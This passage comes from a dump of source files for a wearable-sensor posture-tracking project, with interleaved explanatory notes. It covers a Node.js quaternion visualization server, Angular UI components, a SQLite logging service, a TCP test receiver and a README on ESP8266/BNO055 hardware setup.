},
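`mac2Id` in the backup server appears intended to derive a stable 4-byte machine id from the last four octets of the MAC address, read as a little-endian unsigned 32-bit integer (the Buffer juggling in the JS does not quite do that as written). The apparent intent, expressed in Python (a sketch; struct performs the little-endian read):

```python
import struct

def mac2id(mac):
    # Take the last four octets of 'aa:bb:cc:dd:ee:ff' and read them
    # as a little-endian unsigned 32-bit integer.
    octets = bytes(int(part, 16) for part in mac.split(':')[2:])
    return struct.unpack('<I', octets)[0]

print(mac2id('aa:bb:cc:dd:ee:ff'))  # 0xffeeddcc == 4293844428
```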
{
"alpha_fraction": 0.6094478964805603,
"alphanum_fraction": 0.652324378490448,
"avg_line_length": 36.34269714355469,
"blob_id": "b7d6d98839df9184ae3632eb639a82866b7b6767",
"content_id": "c890debca1f31aa3ac6167ec6ac4cbe1306c98cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 6647,
"license_type": "no_license",
"max_line_length": 320,
"num_lines": 178,
"path": "/oriTrakHAR-master/sensorDataCollection/dataServer_streamming/realtimeVis.js",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "'use strict'\nconst THREE = require('three.js-node')\nconst WSServer = require('http').createServer()\nconst io = require('socket.io')(WSServer)\nconst config = require('./config')\nconst ANGLE_MAP_R = require('./rightDict_yzx.json')\nconst ANGLE_MAP_L = require('./leftDict_yzx.json')\n\nWSServer.listen(config.SOCKET_IO_PORT, '0.0.0.0')\n\nconst originAxis = {\n w: 0,\n x: 0,\n y: 1,\n z: 0\n}\n\nconst torsoInitQuat = {\n w: 0.74725341796875,\n x: -0.08258056640625,\n y: -0.01483154296875,\n z: 0.65924072265625\n}\n\nconst headInitQuat = {\n w: 0.7724609375,\n x: -0.03839111328125,\n y: -0.1016845703125,\n z: 0.62567138671875\n}\n\nvar torsoOffset = q12q2(torsoInitQuat, originAxis)\nvar headOffset = q12q2(headInitQuat, originAxis)\n\n// torsoOffset = {\n// w: -0.01483116439305834,\n// x: 0.6592238955120293,\n// y: 0.747234344297174,\n// z: 0.08257845853418903\n// }\n\nvar curTorso = {}\n\nfunction updateRealtimeVis (quat, idStr) {\n var z = quat.z\n quat.z = quat.x\n quat.x = quat.y\n quat.y = z\n\n switch (config.SENSOR_DICT[idStr]) {\n case 'torso':\n curTorso = getQuaternionProduct(quat, torsoOffset)\n\n // console.log(`torsoOffset: ${JSON.stringify(torsoOffset, null, 2)}`)\n // console.log(`headOffset: ${JSON.stringify(headOffset, null, 2)}`)\n\n // var euler = new THREE.Euler().setFromQuaternion(curTorso, config.EULER_ORDER)\n // console.log(`torso: ${JSON.stringify(quat, null, 2)}\n // ${JSON.stringify(curTorso, null, 2)}\n // ${JSON.stringify(euler)}\n // `)\n // torsoCalibrate(quat)\n io.sockets.emit('newData', {\n id: config.SENSOR_DICT[idStr],\n quat: curTorso\n })\n break\n case 'head':\n // console.log(`head: ${JSON.stringify(quat, null, 2)}\\n ${JSON.stringify(getQuaternionProduct(quat, headOffset), null, 2)}`)\n var headQuat = getQuaternionProduct(quat, headOffset)\n // var euler = new THREE.Euler().setFromQuaternion(headQuat, config.EULER_ORDER)\n // console.log(`head: ${JSON.stringify(quat, null, 2)}\n // ${JSON.stringify(headQuat, null, 2)}\n // ${JSON.stringify(euler)}\n // `)\n io.sockets.emit('newData', {\n id: config.SENSOR_DICT[idStr],\n quat: headQuat\n })\n\n break\n case 'rightArm':\n if (curTorso.w) {\n let relativeAngle = q12q2(curTorso, quat)\n let relativeQuat = new THREE.Quaternion(relativeAngle.x, relativeAngle.y, relativeAngle.z, relativeAngle.w)\n let relativeEuler = new THREE.Euler().setFromQuaternion(relativeQuat, config.EULER_ORDER)\n\n let ans = ANGLE_MAP_R[rad2Bucket(relativeEuler._y)][rad2Bucket(relativeEuler._z)][rad2Bucket(relativeEuler._x)]\n if (ans.shoulderX !== null) {\n let upperArmRelativeEuler = new THREE.Euler(deg2rad(ans.shoulderX), deg2rad(ans.shoulderY), deg2rad(ans.shoulderZ), config.EULER_ORDER)\n let upperArmQuat = getQuaternionProduct(curTorso, new THREE.Quaternion().setFromEuler(upperArmRelativeEuler))\n let quatEuler = new THREE.Euler().setFromQuaternion(quat, config.EULER_ORDER)\n let curTorsoEuler = new THREE.Euler().setFromQuaternion(curTorso, config.EULER_ORDER)\n console.log(`Torso: ${rad2Bucket(curTorsoEuler.y)} ${rad2Bucket(curTorsoEuler.z)} ${rad2Bucket(curTorsoEuler.x)} R: ${rad2Bucket(quatEuler.y)} ${rad2Bucket(quatEuler.z)} ${rad2Bucket(quatEuler.x)} --- ${rad2Bucket(relativeEuler._y)} ${rad2Bucket(relativeEuler._z)} ${rad2Bucket(relativeEuler._x)}`)\n io.sockets.emit('newData', {id: 'rightUpper', quat: upperArmQuat})\n }\n io.sockets.emit('newData', {id: 'rightLower', quat: quat})\n }\n break\n\n case 'leftArm':\n if (curTorso.w) {\n let relativeAngle = q12q2(curTorso, quat)\n let relativeQuat = new 
THREE.Quaternion(relativeAngle.x, relativeAngle.y, relativeAngle.z, relativeAngle.w)\n let relativeEuler = new THREE.Euler().setFromQuaternion(relativeQuat, config.EULER_ORDER)\n\n let ans = ANGLE_MAP_L[rad2Bucket(relativeEuler._y)][rad2Bucket(relativeEuler._z)][rad2Bucket(relativeEuler._x)]\n if (ans.shoulderX !== null) {\n let upperArmRelativeEuler = new THREE.Euler(deg2rad(ans.shoulderX), deg2rad(ans.shoulderY), deg2rad(ans.shoulderZ), config.EULER_ORDER)\n let upperArmQuat = getQuaternionProduct(curTorso, new THREE.Quaternion().setFromEuler(upperArmRelativeEuler))\n // let quatEuler = new THREE.Euler().setFromQuaternion(quat, config.EULER_ORDER)\n // console.log(`L: ${rad2Bucket(quatEuler.y)} ${rad2Bucket(quatEuler.z)} ${rad2Bucket(quatEuler.x)} --- ${rad2Bucket(relativeEuler._y)} ${rad2Bucket(relativeEuler._z)} ${rad2Bucket(relativeEuler._x)}`)\n io.sockets.emit('newData', {id: 'leftUpper', quat: upperArmQuat})\n }\n io.sockets.emit('newData', {id: 'leftLower', quat: quat})\n }\n break\n }\n}\n\nfunction getQuaternionProduct (q, r) {\n // ref: https://www.mathworks.com/help/aeroblks/quaternionmultiplication.html\n return {\n w: r.w * q.w - r.x * q.x - r.y * q.y - r.z * q.z,\n x: r.w * q.x + r.x * q.w - r.y * q.z + r.z * q.y,\n y: r.w * q.y + r.x * q.z + r.y * q.w - r.z * q.x,\n z: r.w * q.z - r.x * q.y + r.y * q.x + r.z * q.w\n }\n}\n\nfunction getInverseQuaternion (quat) {\n // ref: https://www.mathworks.com/help/aeroblks/quaternioninverse.html?s_tid=gn_loc_drop\n const denominator = quat.w * quat.w + quat.x * quat.x + quat.y * quat.y + quat.z * quat.z\n return {\n w: quat.w / denominator,\n x: -quat.x / denominator,\n y: -quat.y / denominator,\n z: -quat.z / denominator\n }\n}\n\nconst torsoZRotate = {\n w: 0.707,\n x: 0,\n y: 0,\n z: 0.707\n}\n\nfunction torsoCalibrate (quat) {\n var offsetTorso = getQuaternionProduct(quat, torsoZRotate)\n var euler = new THREE.Euler().setFromQuaternion(offsetTorso, config.EULER_ORDER)\n euler.x = 0\n euler.z = 0\n var expectedTorsoQuat = new THREE.Quaternion().setFromEuler(euler)\n var newTorsoOffset = q12q2(quat, expectedTorsoQuat)\n console.log(`newTorsoOffset ${JSON.stringify(newTorsoOffset, null, 2)}`)\n // console.log(`torso: ${JSON.stringify(quat, null, 2)}\n // ${JSON.stringify(offsetTorso, null, 2)}\n // yaw: ${euler._y * 180 / Math.PI} pitch: ${euler._z * 180 / Math.PI} roll: ${euler._x * 180 / Math.PI}\n // `)\n}\n\nfunction q12q2 (q1, q2) {\n return getQuaternionProduct(getInverseQuaternion(q1), q2)\n}\n\nfunction deg2rad (deg) {\n return deg * Math.PI / 180\n}\n\nfunction rad2Bucket (rad) {\n var ans = Math.floor(rad / deg2rad(config.ANSWER_INTERVAL)) * config.ANSWER_INTERVAL\n return ans === 180 ? 180 - config.ANSWER_INTERVAL : ans\n}\n\n// module.exports = {\n// updateRealtimeVis: updateRealtimeVis\n// }\n"
},
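A minimal standalone sketch (plain Node.js, no dependencies) of the quaternion algebra the realtime server above relies on: `getQuaternionProduct` implements the bilinear product from the referenced MathWorks page, `getInverseQuaternion` divides the conjugate by the squared norm, and `q12q2(q1, q2)` composes the inverse of `q1` with `q2` to obtain the relative rotation. The helper bodies are copied from the record above; the sample quaternion value is illustrative only.

```js
// Sanity check for the quaternion helpers used by the realtime server.
function product (q, r) {
  // Same bilinear form as getQuaternionProduct above.
  return {
    w: r.w * q.w - r.x * q.x - r.y * q.y - r.z * q.z,
    x: r.w * q.x + r.x * q.w - r.y * q.z + r.z * q.y,
    y: r.w * q.y + r.x * q.z + r.y * q.w - r.z * q.x,
    z: r.w * q.z - r.x * q.y + r.y * q.x + r.z * q.w
  }
}

function inverse (q) {
  // Conjugate divided by the squared norm.
  const n = q.w * q.w + q.x * q.x + q.y * q.y + q.z * q.z
  return { w: q.w / n, x: -q.x / n, y: -q.y / n, z: -q.z / n }
}

// A rotation composed with its inverse is the identity {w: 1, x: 0, y: 0, z: 0},
// so q12q2(q, q) = product(inverse(q), q) should print (approximately) that.
const q = { w: 0.747, x: -0.083, y: -0.015, z: 0.659 } // illustrative value
console.log(product(inverse(q), q))
```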
{
"alpha_fraction": 0.6967871189117432,
"alphanum_fraction": 0.6967871189117432,
"avg_line_length": 28.294116973876953,
"blob_id": "ee37efc87071be62c9c50dd5e0aeb11526c688b1",
"content_id": "acd3c54bb14edd0bd76398b5efe474462ba7950f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 498,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 17,
"path": "/oriTrakHAR-master/robotVisualizationRealtime/src/app/app.component.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { Component } from '@angular/core';\nimport { SockService } from './services/sock.service';\nimport { DataModelService } from './services/data-model.service';\n\n@Component({\n selector: 'app-root',\n templateUrl: './app.component.html',\n styleUrls: ['./app.component.css']\n})\nexport class AppComponent {\n status\n axisNames\n constructor(private dataModel: DataModelService, private sock: SockService) {\n this.status = dataModel.status;\n this.axisNames = ['north', 'Up', 'East'];\n }\n}\n"
},
{
"alpha_fraction": 0.6067595481872559,
"alphanum_fraction": 0.6178119778633118,
"avg_line_length": 31.347150802612305,
"blob_id": "556e600376cb6c0e0e8e6b1e65519af54b4ed62b",
"content_id": "33d1ed58788908c25aca6037b853aaf9ce95b92e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 6243,
"license_type": "no_license",
"max_line_length": 227,
"num_lines": 193,
"path": "/oriTrakHAR-master/sensorDataCollection/dataServer_streamming/prev_db_service/db_service_old.js",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "'use strict'\nconst sqlite3 = require('sqlite3').verbose()\nconst Promise = require('bluebird')\nconst db = new sqlite3.Database('./userActivityData.db')\n\nfunction runQueryGen (db) {\n return function runQuery (sql, params) {\n return new Promise((resolve, reject) => {\n db.run(sql, params || [], (err) => {\n if (err) {\n reject(err)\n } else {\n resolve(true)\n }\n })\n sql = null\n params = null\n })\n .catch(e => {\n console.log(e)\n })\n }\n}\n\nfunction allQueryGen (db) {\n return function runQuery (sql, params) {\n return new Promise((resolve, reject) => {\n db.all(sql, params || [], (err, res) => {\n if (err) {\n reject(err)\n } else {\n resolve(res)\n }\n })\n sql = null\n params = null\n })\n .catch(e => {\n console.log(e)\n })\n }\n}\n\ndb.runQuery = runQueryGen(db)\ndb.allQuery = allQueryGen(db)\n\nvar dbPromise = db.runQuery(`\n CREATE TABLE IF NOT EXISTS SensorData100Hz(\n id INTEGER PRIMARY KEY,\n server_id INTEGER NOT NULL,\n sensor_id INTEGER NOT NULL,\n sensor_timestamp INTEGER NOT NULL,\n server_timestamp INTEGER NOT NULL,\n quat_w REAL NOT NULL,\n quat_x REAL NOT NULL,\n quat_y REAL NOT NULL,\n quat_z REAL NOT NULL,\n gyro_x REAL NOT NULL,\n gyro_y REAL NOT NULL,\n gyro_z REAL NOT NULL,\n lacc_x REAL NOT NULL,\n lacc_y REAL NOT NULL,\n lacc_z REAL NOT NULL,\n acc_x REAL NOT NULL,\n acc_y REAL NOT NULL,\n acc_z REAL NOT NULL\n );`)\n.then(res => {\n return db.runQuery(`\n CREATE TABLE IF NOT EXISTS SensorData20Hz(\n id INTEGER PRIMARY KEY,\n server_id INTEGER NOT NULL,\n sensor_id INTEGER NOT NULL,\n sensor_timestamp INTEGER NOT NULL,\n server_timestamp INTEGER NOT NULL,\n mag_x REAL NOT NULL,\n mag_y REAL NOT NULL,\n mag_z REAL NOT NULL\n );`)\n})\n.then(res => {\n return db.runQuery(`\n CREATE TABLE IF NOT EXISTS SensorData1Hz(\n id INTEGER PRIMARY KEY,\n server_id INTEGER NOT NULL,\n sensor_id INTEGER NOT NULL,\n sensor_timestamp INTEGER NOT NULL,\n server_timestamp INTEGER NOT NULL,\n temp INTEGER NOT NULL\n );`)\n})\n\n.then(res => {\n return db.runQuery(`\n CREATE TABLE IF NOT EXISTS SensorFreq(\n id INTEGER PRIMARY KEY,\n server_id INTEGER NOT NULL,\n sensor_id INTEGER NOT NULL,\n server_timestamp INTEGER NOT NULL,\n frequency INTEGER NOT NULL\n );`)\n})\n\n.then(res => {\n return db.runQuery(`\n CREATE INDEX IF NOT EXISTS sensor_timestamp_100 on SensorData100Hz(sensor_timestamp);`)\n})\n.then(res => {\n return db.runQuery(`\n CREATE INDEX IF NOT EXISTS server_timestamp_100 on SensorData100Hz(server_timestamp);`)\n})\n.then(res => {\n return db.runQuery(`\n CREATE INDEX IF NOT EXISTS sensor_timestamp_20 on SensorData20Hz(sensor_timestamp);`)\n})\n.then(res => {\n return db.runQuery(`\n CREATE INDEX IF NOT EXISTS SensorFreq_server_timestamp on SensorFreq(server_timestamp);`)\n})\n.then(res => {\n return db.runQuery(`\n CREATE INDEX IF NOT EXISTS server_timestamp_20 on SensorData20Hz(server_timestamp);`)\n})\n.then(res => {\n return db.runQuery(`\n CREATE INDEX IF NOT EXISTS sensor_timestamp_1 on SensorData1Hz(sensor_timestamp);`)\n})\n.then(res => {\n return db.runQuery(`\n CREATE INDEX IF NOT EXISTS server_timestamp_1 on SensorData1Hz(server_timestamp);`)\n})\n.then(res => {\n return db.runQuery(`\n CREATE INDEX IF NOT EXISTS id_100 on SensorData100Hz(sensor_id, server_id);`)\n})\n.then(res => {\n return db.runQuery(`\n CREATE INDEX IF NOT EXISTS id_20 on SensorData20Hz(sensor_id, server_id);`)\n})\n.then(res => {\n return db.runQuery(`\n CREATE INDEX IF NOT EXISTS id_1 on SensorData1Hz(sensor_id, server_id);`)\n})\n.then(res => {\n return 
db.runQuery(`\n CREATE INDEX IF NOT EXISTS SensorFreq_id on SensorFreq(sensor_id, server_id);`)\n})\n\nfunction insertSensorData100Hz (serverId, sensorId, sensorTimestamp, serverTimestamp, data) {\n dbPromise = dbPromise.then(res => {\n // console.log(data)\n var promise = db.runQuery(`INSERT INTO SensorData100Hz(server_id, sensor_id, sensor_timestamp, server_timestamp, quat_w, quat_x, quat_y, quat_z, gyro_x, gyro_y, gyro_z, lacc_x, lacc_y, lacc_z, acc_x, acc_y, acc_z)\n VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)`,\n [serverId, sensorId, sensorTimestamp, serverTimestamp, data.quat.w, data.quat.x, data.quat.y, data.quat.z, data.gyro.x, data.gyro.y, data.gyro.z, data.lacc.x, data.lacc.y, data.lacc.z, data.acc.x, data.acc.y, data.acc.z])\n data = null\n return promise\n })\n}\n\nfunction insertSensorData20Hz (serverId, sensorId, sensorTimestamp, serverTimestamp, data) {\n dbPromise = dbPromise.then(res => {\n var promise = db.runQuery(`INSERT INTO SensorData20Hz(server_id, sensor_id, sensor_timestamp, server_timestamp, mag_x, mag_y, mag_z)\n VALUES(?, ?, ?, ?, ?, ?, ?)`,\n [serverId, sensorId, sensorTimestamp, serverTimestamp, data.mag.x, data.mag.y, data.mag.z])\n data = null\n return promise\n })\n}\n\nfunction insertSensorData1Hz (serverId, sensorId, sensorTimestamp, serverTimestamp, data) {\n dbPromise = dbPromise.then(res => {\n var promise = db.runQuery(`INSERT INTO SensorData1Hz(server_id, sensor_id, sensor_timestamp, server_timestamp, temp)\n VALUES(?, ?, ?, ?, ?)`,\n [serverId, sensorId, sensorTimestamp, serverTimestamp, data.temp])\n data = null\n return promise\n })\n}\nfunction insertHealth (serverId, sensorId, serverTimestamp, freq) {\n dbPromise = dbPromise.then(res => {\n var promise = db.runQuery(`INSERT INTO SensorFreq(server_id, sensor_id, server_timestamp, frequency)\n VALUES(?, ?, ?, ?)`,\n [serverId, sensorId, serverTimestamp, freq])\n freq = null\n return promise\n })\n}\nmodule.exports = {\n insertSensorData100Hz: insertSensorData100Hz,\n insertSensorData20Hz: insertSensorData20Hz,\n insertSensorData1Hz: insertSensorData1Hz,\n insertHealth: insertHealth\n}\n"
},
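The service above wraps callback-style `sqlite3` calls in promises and threads every statement through a single `dbPromise` chain so writes execute strictly in order. Below is a reduced sketch of that wrap-and-chain pattern, assuming the `sqlite3` npm package is installed; the table and sample values are hypothetical.

```js
// Promisify db.run once, then serialize all writes on one promise chain.
const sqlite3 = require('sqlite3').verbose()
const db = new sqlite3.Database(':memory:') // in-memory DB for illustration

function runQuery (sql, params) {
  return new Promise((resolve, reject) => {
    db.run(sql, params || [], err => (err ? reject(err) : resolve(true)))
  })
}

let chain = runQuery('CREATE TABLE kv (k TEXT, v TEXT)')

function insert (k, v) {
  // Each insert waits for the previous statement, preserving write order.
  chain = chain.then(() => runQuery('INSERT INTO kv VALUES (?, ?)', [k, v]))
  return chain
}

insert('sensor', 'torso')
insert('sensor', 'head').then(() => console.log('done')).catch(console.error)
```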
{
"alpha_fraction": 0.5508772134780884,
"alphanum_fraction": 0.680701732635498,
"avg_line_length": 55.599998474121094,
"blob_id": "b1a319848d5fb03ebf8ac014bc3dc71ede956377",
"content_id": "3083036f8edf26f6388468a91eb71d083fdd914b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 285,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 5,
"path": "/oriTrakHAR-master/rawDataVis/src/app/serverAddr.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "// echo 65536 | sudo tee -a /proc/sys/fs/inotify/max_user_watches\n// export const wsAddr = 'http://yuhui-desktop.duckdns.org:8080';\nexport const wsAddr = 'http://localhost:8088';\n// export const wsAddr = 'http://192.168.0.9:8080';\n// export const wsAddr = 'http://192.168.2.1:8088';\n\n\n"
},
{
"alpha_fraction": 0.6551724076271057,
"alphanum_fraction": 0.6934865713119507,
"avg_line_length": 19.076923370361328,
"blob_id": "5aa1ff2511fd73d86549056cc03b806a23ca546d",
"content_id": "0ff081939e0b892ffd048e3b55742dab99a34195",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 261,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 13,
"path": "/oriTrakHAR-master/sensorDataCollection/sensorSimulator/virtualReciever.js",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "var net = require('net')\n\nvar server = net.createServer()\n\nfunction processData (data) {\n console.log(data)\n}\nserver.on('connection', client => {\n console.log(client.server._connectionKey)\n client.on('data', processData)\n})\n\nserver.listen(9000, '127.0.0.1')\n"
},
{
"alpha_fraction": 0.5890074968338013,
"alphanum_fraction": 0.6148297786712646,
"avg_line_length": 38.611427307128906,
"blob_id": "840da00cf9d0152929292171645b959dad74635d",
"content_id": "aee63d59ee07a63c7e9f4e3faa7cee0c2e6f33a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 6932,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 175,
"path": "/oriTrakHAR-master/rawDataVis/src/app/components/bottom-time-line/bottom-time-line.component.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { Component, OnInit, ViewChild} from '@angular/core';\nimport { SockService } from '../../services/sock.service';\nimport { DataModelService } from '../../services/data-model.service';\nimport { Observable } from 'rxjs/Observable';\nimport { NouiFormatter } from 'ng2-nouislider';\n\nexport class TimeFormatterHHMMSS implements NouiFormatter {\n to(value: number): string {\n return new Date(value).toString().slice(15, 25);\n };\n\n from(value: string): number {\n return 0;\n }\n}\n\nexport class TimeFormatterHHMM implements NouiFormatter {\n to(value: number): string {\n return new Date(value).toString().slice(15, 21);\n };\n\n from(value: string): number {\n return 0;\n }\n}\n\n\n@Component({\n selector: 'app-bottom-time-line',\n templateUrl: './bottom-time-line.component.html',\n styleUrls: ['./bottom-time-line.component.css']\n})\nexport class BottomTimeLineComponent implements OnInit {\n @ViewChild('nouislider') nouislider: any;\n private MAX_WINDOW_SIZE = 3600000;\n private MIN_WINDOW_SIZE = 30000;\n public status = this.dataModel.status;\n public formatter_hhmmss = new TimeFormatterHHMMSS()\n public formatter_hhmm = new TimeFormatterHHMM()\n public minTime = 0;\n public maxTime = 5;\n\n public config = {\n connect: [false, true, true, true, false],\n start: [1, 2, 3, 4],\n step: 1000,\n tooltips: [this.formatter_hhmmss, this.formatter_hhmmss, this.formatter_hhmmss, this.formatter_hhmmss],\n animationDuration: 5,\n pips: {\n mode: 'values',\n values: [],\n format: this.formatter_hhmm,\n }\n };\n // public status.start_selected_end = [1, 2, 3, 5];\n\n private previousEvent = [];\n public histUpdateTimeout;\n\n\n newDateSelectedObservable: Observable<any> = this.dataModel.getNewDateSelectedSubscribable();\n constructor(private dataModel: DataModelService, private sock: SockService) {\n\n }\n\n ngOnInit() {\n this.newDateSelectedObservable.subscribe(handleNewDateSelected.bind(this));\n function handleNewDateSelected(msg) {\n // console.log(`${JSON.stringify(this.config)} msg: ${JSON.stringify(msg)}`)\n this.minTime = msg.min;\n this.maxTime = msg.max;\n var startingDate = new Date(this.minTime)\n startingDate.setMinutes(0);\n startingDate.setMilliseconds(0);\n var startT = startingDate.valueOf();\n var endingDate = new Date(this.maxTime);\n endingDate.setHours(endingDate.getHours() + 1)\n endingDate.setMinutes(0);\n endingDate.setMilliseconds(0);\n var endT = endingDate.valueOf();\n var valueList = []\n for (var i = startT; i < endT; i = i + 1800000) {\n valueList.push(i)\n }\n valueList = valueList.filter(d => (d >= this.minTime) && (d <= this.maxTime))\n if (valueList[0] - this.minTime > 300000) {\n valueList = [this.minTime].concat(valueList)\n }\n if (this.maxTime - valueList[valueList.length - 1] > 300000) {\n valueList.push(this.maxTime)\n }\n this.config.pips.values = valueList\n\n if (this.nouislider) {\n this.nouislider.slider.updateOptions({range: {min: msg.min, max: msg.max}});\n this.nouislider.slider.updateOptions(this.config);\n } else {\n this.onChange([msg.min, msg.min + 300000, msg.min + 1200000, msg.max])\n }\n this.status.start_selected_end = [msg.min, msg.min + 300000, msg.min + 1200000, msg.max];\n }\n }\n\n public onChange(event) {\n this.dataModel.status.selectedTimeStart = new Date(event[0]);\n this.dataModel.status.selectedTimeEnd = new Date(event[3]);\n this.dataModel.status.animationStartTime = new Date(event[1]);\n this.dataModel.status.histStartTime = new Date(event[1]);\n this.dataModel.status.animationEndTime = new Date(event[2]);\n 
this.dataModel.status.histEndTime = new Date(event[2]);\n if (this.histUpdateTimeout) {\n clearTimeout(this.histUpdateTimeout)\n this.histUpdateTimeout = false\n }\n this.histUpdateTimeout = setTimeout((() => {\n // Auto change window logic\n if (event[0] !== this.previousEvent[0]) {\n console.log('changed 0');\n } else if (event[3] !== this.previousEvent[3]) {\n\n } else {\n if (this.status.windowFixed) {\n if ((event[1] + this.status.windowWidth) > event[3]) {\n this.status.start_selected_end = [event[0], event[3] - this.status.windowWidth, event[3], event[3]];\n } else if ((event[2] - this.status.windowWidth) < event[0]) {\n this.status.start_selected_end = [event[0], event[0], event[0] + this.status.windowWidth, event[3]];\n } else if (event[1] !== this.previousEvent[1]) {\n // console.log('1 moved')\n this.status.start_selected_end = [event[0], event[1], event[1] + this.status.windowWidth, event[3]];\n } else if (event[2] !== this.previousEvent[2]) {\n // console.log('2 moved')\n this.status.start_selected_end = [event[0], event[2] - this.status.windowWidth, event[2], event[3]];\n }\n } else {\n if (event[1] !== this.previousEvent[1]) {\n // User moved interested_window_start\n // console.log('move 1')\n if ((event[2] - event[1]) < this.MIN_WINDOW_SIZE) {\n console.log('too small')\n this.status.start_selected_end = [event[0], event[1], event[1] + this.MIN_WINDOW_SIZE, event[3]]\n if (this.status.start_selected_end[2] > this.status.start_selected_end[3]) {\n this.status.start_selected_end = [event[0], event[1], event[3], event[3]]\n }\n } else if ((event[2] - event[1]) > this.MAX_WINDOW_SIZE) {\n this.status.start_selected_end = [event[0], event[1], event[1] + this.MAX_WINDOW_SIZE, event[3]]\n }\n } else if (event[2] !== this.previousEvent[2]) {\n // console.log('move 2')\n // User moved interested_window_end\n if ((event[2] - event[1]) > this.MAX_WINDOW_SIZE) {\n this.status.start_selected_end[1] = event[2] - this.MAX_WINDOW_SIZE;\n this.status.start_selected_end = [event[0], event[2] - this.MAX_WINDOW_SIZE, event[2], event[3]]\n // console.log(this.status.start_selected_end)\n } else if ((event[2] - event[1]) < this.MIN_WINDOW_SIZE) {\n this.status.start_selected_end = [event[0], event[2] - this.MIN_WINDOW_SIZE, event[2], event[3]]\n\n }\n }\n\n if (event[1] === event[2]) {\n this.status.start_selected_end = [event[0], event[1], event[1] + this.MIN_WINDOW_SIZE, event[3]]\n if (this.status.start_selected_end[2] > this.status.start_selected_end[3]) {\n this.status.start_selected_end = [event[0], event[1], event[3], event[3]]\n }\n }\n }\n this.sock.updateHist();\n }\n this.dataModel.updateDisplayClusterData();\n this.previousEvent = JSON.parse(JSON.stringify(event));\n }).bind(this, event), 80);\n }\n\n\n}\n"
},
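The `onChange` handler above coalesces rapid slider events by clearing and re-arming an 80 ms `setTimeout` before recomputing the histogram, so only the last event in a burst does real work. A generic sketch of that trailing-edge debounce idiom follows; the callback here is a placeholder, not the component's actual update path.

```js
// Trailing-edge debounce: restart the timer on every call, so fn runs
// only after the input has been quiet for delayMs.
function debounce (fn, delayMs) {
  let timer = null
  return function (...args) {
    if (timer) clearTimeout(timer)
    timer = setTimeout(() => fn.apply(this, args), delayMs)
  }
}

const updateHist = debounce(range => console.log('recompute hist for', range), 80)
updateHist([0, 100]) // superseded
updateHist([0, 200]) // only this call fires, ~80 ms later
```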
{
"alpha_fraction": 0.7404543161392212,
"alphanum_fraction": 0.7680038809776306,
"avg_line_length": 71.5614013671875,
"blob_id": "76eb58079d31dd15157c23ff150fbf61a15ea34d",
"content_id": "41762fd30d805728e6e1712774145d5ebf6441fe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4138,
"license_type": "no_license",
"max_line_length": 693,
"num_lines": 57,
"path": "/oriTrakHAR-master/sensorDataCollection/README.md",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "# oriTrakHAR Sensor Data Collection\nThis folder is for the sensor data collection part of the oritrak based human activity recognition project. It contains information about sensor hardware setup, embeded code for collecting data, and server side code to record the data.\n\n## System Overview\nEach sensor module consists of an [esp8266 nodeMCU D1 Mini V2 wifi chip](https://www.amazon.com/Makerfocus-ESP8266-Wireless-Development-Compatible/dp/B01MU4XDNX/ref=sr_1_50_sspa?s=electronics&ie=UTF8&qid=1516376792&sr=1-50-spons&keywords=D1+Mini+NodeMcu&psc=1), a [Bno-055 absolute orientation sensor](https://www.adafruit.com/product/2472), and a replacable 3.7v li-po battery. The esp8266 chip runs arduino code and connects to the Bno-055 chip via I2C. In action, a server device (rpi3 or an android phone) would setup a wifi soft access point. Each sensor module connects to the wifi access point and send sensor data via TCP sockets to the server device running the data recording script.\n\n-- TODO: add picture\n\n## Folder Structure\n```\n.\n+-- README.md\n+-- dataServer // node.js data collection code for raspberry pi 3 as the server device\n+-- espBno055 // arduino code for the sensor module\n+-- Adafruit_BNO055_modified.zip // modified bno-055 library to work with the sensor module. Changed defualt I2C pins to nodeMCU D1 Mini pins. Changed I2C bus speed to 400k.\n```\n\n## Raspberry Pi 3 as a Server Device Setup\nThe raspberry pi 3 serves 2 purposes. 1. Act as a wifi soft access point so that the sensor modules can connect to it and send information via TCP sockets. 2. Run data collection script(a node.js script) to record the data.\n\n### Raspberry Pi 3 as a Soft Access Point\nFollow [this tutorial](https://www.raspberrypi.org/documentation/configuration/wireless/access-point.md)\n\n### SSH\nFollow [this tutorial](https://www.raspberrypi.org/documentation/remote-access/ssh/)\n\n### Install node.js\nFollow [this guide](https://nodejs.org/en/download/package-manager/), install the latest LTS version\n\n### Run Data Collection Script\n```\n cd dataServer\n node ./dataServer\n```\n\n### TODO: set schipt to auto run at boot\n\n## Sensor Module Hardware Setup\nThe nodeMCU chip is connected to the Bno-055 chip via I2C. The I2C pins of boths chips are soldered together.\n-- TODO: add picture\n\nPinout of the nodeMCU chip:\n\nPinout of the Bno-055 chip:\n\nNote that the it is not neccessary to use the nodeMCU chip. Any esp8266 based chip should work. esp8266 chip does not have hardware I2C support. Since I2C is implemented in the software, user can define the SCL and SDA pin of the chip. The module we made are defined as shown in the picuture above.\n\n### Use Arduino with esp8266\nFollow [this tutorial](https://learn.adafruit.com/adafruit-huzzah-esp8266-breakout/using-arduino-ide) to setup your Arduino to use with esp8266 chip.\nCurrent code also supports over the 